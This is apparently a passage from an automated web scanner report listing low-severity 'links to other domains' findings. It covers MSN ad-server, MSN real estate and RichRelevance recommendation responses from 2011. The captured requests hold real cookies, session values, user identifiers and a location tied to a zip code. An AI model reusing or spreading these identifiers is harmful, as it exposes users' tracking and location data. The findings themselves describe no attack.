Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgEAtw5ZB7gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 2420
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: FC01=FB=AgIAtw5ZB7gB5Qe4AQ; expires=Thu, 25-Apr-2013 12:00:00 GMT; domain=.rad.msn.com; path=/; HttpOnly
X-RADID: P8621408-T39837451-C29000000000076906
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:56 GMT
Content-Length: 2420


//<![CDATA[
function getRADIds() { return{"adid":"29000000000076906","pid":"8621408","targetid":"39837451"};} if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 250);if(pare
...[SNIP]...
</html>';ifrm.src = "javascript:void(document.write('" + s + "'));";}function renderAd_2032206285() {var adCode_2032206285=new Array();adCode_2032206285.push('<iframe src="http://view.atdmt.com/NYC/iview/296638382/direct;;wi.300;hi.250/01?click=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');adCode_2032206285.push('<scr'+'ipt language="JavaScript" type="text/javascript">\n');adCode_2032206285.push('document.write(\'<a href="http://clk.atdmt.com/NYC/go/296638382/direct;;wi.300;hi.250/01/" target="_blank"><img src="http://view.atdmt.com/NYC/view/296638382/direct;;wi.300;hi.250/01/"/></a>
...[SNIP]...

19.93. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVPC1&AP=1455 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC06=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; FC01=FB=AgEAtg5ZB7AB; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 839
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8050733-T28253484-C50000000000031126
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:35:52 GMT
Content-Length: 839


//<![CDATA[
function getRADIds() { return{"adid":"50000000000031126","pid":"8050733","targetid":"28253484"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 300, 60);}
t
...[SNIP]...
<a href="http://g.msn.com/2AD0003K/50000000000031126.1??PID=8050733&amp;UIT=G&amp;TargetID=28253484&amp;AN=1092616712&amp;PG=INVPC1&amp;ASID=24b2386c5bb74c4c843b413b9d0be1ee" target="_blank"><img src="http://ads2.msads.net/CIS/42/000/000/000/011/574.gif" width="300" height="60" alt="click here" border="0" /></a>
...[SNIP]...

19.94. http://rad.msn.com/ADSAdClient31.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rad.msn.com
Path:   /ADSAdClient31.dll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ADSAdClient31.dll?GetSAd=&DPJS=4&PN=MSFT&ID=B506C07761D7465D924574124E3C14DF&MUID=B506C07761D7465D924574124E3C14DF&PG=INVIHS&AP=1402 HTTP/1.1
Host: rad.msn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FC00=FB=; FC02=FB=; FC03=FB=; FC04=FB=; FC05=FB=; FC07=FB=; FC08=FB=; FC09=FB=; MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; FC06=FB=AgEAtw4Q67gB; FC01=FB=AgEAtw5ZB7gB; Sample=37

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 122
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Tue, 26 Apr 2011 18:39:55 GMT
Content-Length: 122

document.write('<!--NOAD--><img src="http://global.msads.net/defaultads/ads/defaultads/1402.gif?C=P&E=10&N=C22&R=CO1"/>');

19.95. http://realestate.msn.com/article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.msn.com
Path:   /article.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /article.aspx?cp-documentid=28280145 HTTP/1.1
Host: realestate.msn.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=V=3&GUID=fdd1ad8ef8e24cf9bbad7ff7c197392d; mh=MSFT; CC=US; CULTURE=EN-US; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=79281a2784894bbe8e11de358b20f4da&bd=2011-04-23T14:00:24.831&v=2; MUID=B506C07761D7465D924574124E3C14DF; DSurv=false; s_cc=true; s_sq=%5B%5BB%5D%5D; Sample=37

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:13 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 91100
Content-Length: 91100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com/">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREA2">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1303843512&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="nonhplink" href="http://ie9.discoverbing.com?form=MFEHPG&amp;publ=MSN&amp;crea=TEXT_MFEHPG_MSNinprod_dhplink_br0303_1x1" target="_new">Upgrade to enhanced Internet Explorer 9 ... FREE</a>
...[SNIP]...
<div class="popularheader"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=home+prices+drop&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=houseplant+care+tips&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=clutter+control&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=rent+or+buy+home&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.facebook.com/msnrealestate">Become a fan on Facebook</a>
...[SNIP]...
<li class="last"><a href="http://www.twitter.com/msnrealestate">Follow us on Twitter</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=tenants+union&amp;form=MSREAL" onclick="window.open(this.href);return false;">Search for a tenants union in your area</a>
...[SNIP]...
<td><link rel="Stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><div id='PlayerAd1Container'></div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<p>"We routinely see this," says Adam Murray, executive director of the <a href="http://www.innercitylaw.org/" onclick="window.open(this.href);return false;">Inner City Law Center</a>
...[SNIP]...
o will resort to strong-arm tactics and bullying tactics, where they will tell a tenant, 'I'm going to come tomorrow and I'm going to change the lock,'" says Dylan Potts, a landlord-tenant lawyer with <a href="http://www.gill-law.com/home/" onclick="window.open(this.href);return false;">Gill Elrod Ragon</a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTO13wBtWMqW0vbBbdTe5ZHjUNxapgezY?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XzMIF8Q9fJPEUJg0HDRAZjS6v8ssBkreO?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XzMIF8Q9fJPEUJg0HDRAZjS6v8ssBkreO?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XR7HJF-W8fXkA3IEPznchTkewtdTh9h8C?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-2875354f5cfce1fc.profile.live.com/msn/posts?mkt=en-us&amp;domain=en-us">william blackford</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-2875354f5cfce1fc.profile.live.com/msn/posts?mkt=en-us&amp;domain=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X8GeFEA_cJ3xo3e-NyzLsUSAgIlQdKaZs?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHVE1zEAybroE5iE-mn_lGXL7Ff0LtJWG?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X9ZD0jQlufIm-gLI9ErKqghdZfIpvFmrX?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XuvTLPhE68EbASkAFR68AV_u3WbNP6yD5?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xto3Hodni5gcwkQngFLd90cdPmplEA8WL?mkt=en-us"><img alt="avatar" src="http://us.social.s-msn.com/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div class="linkedimg"><a href="http://ie9.discoverbing.com?form=MFEHPG&amp;publ=MSN&amp;crea=STND_MFEHPG_MSNinprod_rrbanner_br0303_1x1"><img src="http://blstb.msn.com/i/A2/E5352FCE2F563946DCFF5137966B.jpg" width="300" height="90" alt="Upgrade to enhanced Internet Explorer 9 ... FREE" />
...[SNIP]...
<td><a target="_blank" class="logo" href="http://www.bing.com/?FORM=MSNCRE"><span>
...[SNIP]...
</span><a href="http://www.bing.com/" class="moreLink">web</a>
...[SNIP]...
</span><a href="http://www.bing.com/videos/" class="moreLink">videos</a>
...[SNIP]...
</span><a href="http://www.bing.com/images/" class="moreLink">images</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

19.96. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848188756&pt=%7Ccategory_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43552%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Host: recs.richrelevance.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:03:00 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: uc=29be55fe-5eae-4c8b-a63c-454be4d2779e; Expires=Sun, 14-May-2079 23:17:07 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 11217

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'category_page.bottom',html:'<div class="r3_recommendations"><div
...[SNIP]...
-1&p=179831&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F179831%2F22064637%2Fproductdetail.aspx%3Fpromcode%3D600582C43552%26promtype%3Dinternal" title="Federal Criminal Code and Rules, 2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p22064637-179831S.JPG" alt="Federal Criminal Code and Rules, 2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=179831&MaterialNumber=22064637&Product_type=1&promcode=600582C43552&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn179831" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=29bf55fe-5eae-4c8b-a63c-454be4d2779e&pti=4&pa=bottom&hpi=907&stn=TopSellersClickEV&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=29be55fe-5eae-4c8b-a63c-454be4d2779e&s=bijb1vookoje2tnvwh5oouwn&pg=-1&p=179831&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F179831%2F22064637%2Fproductdetail.aspx%3Fpromcode%3D600582C43552%26promtype%3Dinternal\');"></a>
...[SNIP]...
&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F162495%2F22061301%2Fproductdetail.aspx%3Fpromcode%3D600582C43552%26promtype%3Dinternal" title="Federal Civil Judicial Procedure and Rules, 2011 ed."><img src="http://images.west.thomson.com/store/product_photos/p22061301-162495S.JPG" alt="Federal Civil Judicial Procedure and Rules, 2011 ed." style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43552&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn162495" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=29bf55fe-5eae-4c8b-a63c-454be4d2779e&pti=4&pa=bottom&hpi=907&stn=TopSellersClickEV&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=29be55fe-5eae-4c8b-a63c-454be4d2779e&s=bijb1vookoje2tnvwh5oouwn&pg=-1&p=162495&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F162495%2F22061301%2Fproductdetail.aspx%3Fpromcode%3D600582C43552%26promtype%3Dinternal\');"></a>
...[SNIP]...
ductdetail%2F159219%2F16396836%2Fproductdetail.aspx%3Fpromcode%3D600582C43552%26promtype%3Dinternal" title="California Civil Practice Statutes and Rules Annotated, 2011 ed. (California Desktop Codes)"><img src="http://images.west.thomson.com/store/product_photos/18144107.jpg" alt="California Civil Practice Statutes and Rules Annotated, 2011 ed. (California Desktop Codes)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159219&MaterialNumber=16396836&Product_type=1&promcode=600582C43552&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159219" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=29bf55fe-5eae-4c8b-a63c-454be4d2779e&pti=4&pa=bottom&hpi=907&stn=TopSellersClickEV&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=29be55fe-5eae-4c8b-a63c-454be4d2779e&s=bijb1vookoje2tnvwh5oouwn&pg=-1&p=159219&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159219%2F16396836%2Fproductdetail.aspx%3Fpromcode%3D600582C43552%26promtype%3Dinternal\');"></a>
...[SNIP]...
on.com%2Fproductdetail%2F146586%2F40710037%2Fproductdetail.aspx%3Fpromcode%3D600582C43552%26promtype%3Dinternal" title="Client Education Series: Estate Organizer 2008 Binder Only, Maroon (Quantity 1)"><img src="http://images.west.thomson.com/store/product_photos/print_icon.gif" alt="Client Education Series: Estate Organizer 2008 Binder Only, Maroon (Quantity 1)" style="width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=146586&MaterialNumber=40710037&Product_type=1&promcode=600582C43552&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn146586" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=29bf55fe-5eae-4c8b-a63c-454be4d2779e&pti=4&pa=bottom&hpi=907&stn=TopSellersClickEV&rti=2&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&uguid=29be55fe-5eae-4c8b-a63c-454be4d2779e&s=bijb1vookoje2tnvwh5oouwn&pg=-1&p=146586&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F146586%2F40710037%2Fproductdetail.aspx%3Fpromcode%3D600582C43552%26promtype%3Dinternal\');"></a>
...[SNIP]...

19.97. http://recs.richrelevance.com/rrserver/p13n_generated.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recs.richrelevance.com
Path:   /rrserver/p13n_generated.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848426071&p=160547&re=true&pt=%7Citem_page.right%7Citem_page.bottom&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&s=vcquttfvqvnmfsxfugy4lk3a&ctp=%7C0%3Apromcode%253D600582C43556%7C1%3Apromtype%253Dinternal&l=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: recs.richrelevance.com
Cookie: uc=67a3690e-c6eb-48e0-10ca-254be4d085db; vihc=b73.1303848412428.21158348%7C; pvihc=b73.1303848412428.21158348%7C

Response

HTTP/1.1 200 OK
Server: nginx/0.8.44
Date: Tue, 26 Apr 2011 20:06:56 GMT
Content-Type: application/x-javascript;charset=UTF-8
Connection: keep-alive
P3p: policyref="http://recs.richrelevance.com/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: vihc=b73.1303848416365.21158348%7C; Path=/
Set-Cookie: pvihc=b73.1303848416365.21158348%7C; Expires=Fri, 23-Apr-2021 20:06:56 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 19607

function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'item_page.right',html:'<div class="r3_recommendations"><div id="r
...[SNIP]...
st.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p12484463-160547S.JPG" alt="Bankruptcy Exemption Manual, 2010 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=160547&MaterialNumber=12484463&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn160547" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=62b126ce-e29a-4f38-4315-024be4d0c771&pti=1&pa=right&hpi=903&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=160547&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F160547%2F12484463%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Contract Law (Vol. 49, Texas Practice Series)"><img src="http://images.west.thomson.com/store/product_photos/p40406951-132218S.JPG" alt="Contract Law (Vol. 49, Texas Practice Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=132218&MaterialNumber=40406951&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn132218" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=62b126ce-e29a-4f38-4315-024be4d0c771&pti=1&pa=right&hpi=903&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=132218&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F132218%2F40406951%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
homson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal" title="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)"><img src="http://images.west.thomson.com/store/product_photos/p11634476-159396S.JPG" alt="Bankruptcy Evidence Manual, 2010-2011 ed. (West\'s&#174; Bankruptcy Series)" style="float: left; width:85; height:105;" class="rr_image"></a>
...[SNIP]...
<br /><a href="http://west.thomson.com/store/AddItem.aspx?Product_id=159396&MaterialNumber=11634476&Product_type=1&promcode=600582C43556&promtype=internal"><img src="http://images.west.thomson.com/buttons/AddToCartSmall.gif" border="0" id="rrimgbtn159396" onMouseDown="javascript:rrAttrib(\'http://recs.richrelevance.com/rrserver/click?a=756bd9ec9a083c52&vg=62b126ce-e29a-4f38-4315-024be4d0c771&pti=1&pa=right&hpi=903&stn=ViewedPurchasedPercent&rti=2&u=%7B5a73fb3f-599a-422f-96ca-28b162bf8001%7D&uguid=67a3690e-c6eb-48e0-10ca-254be4d085db&s=vcquttfvqvnmfsxfugy4lk3a&pg=179&p=159396&ct=http%3A%2F%2Fwest.thomson.com%2Fproductdetail%2F159396%2F11634476%2Fproductdetail.aspx%3Fpromcode%3D600582C43556%26promtype%3Dinternal\');"></a>
...[SNIP]...
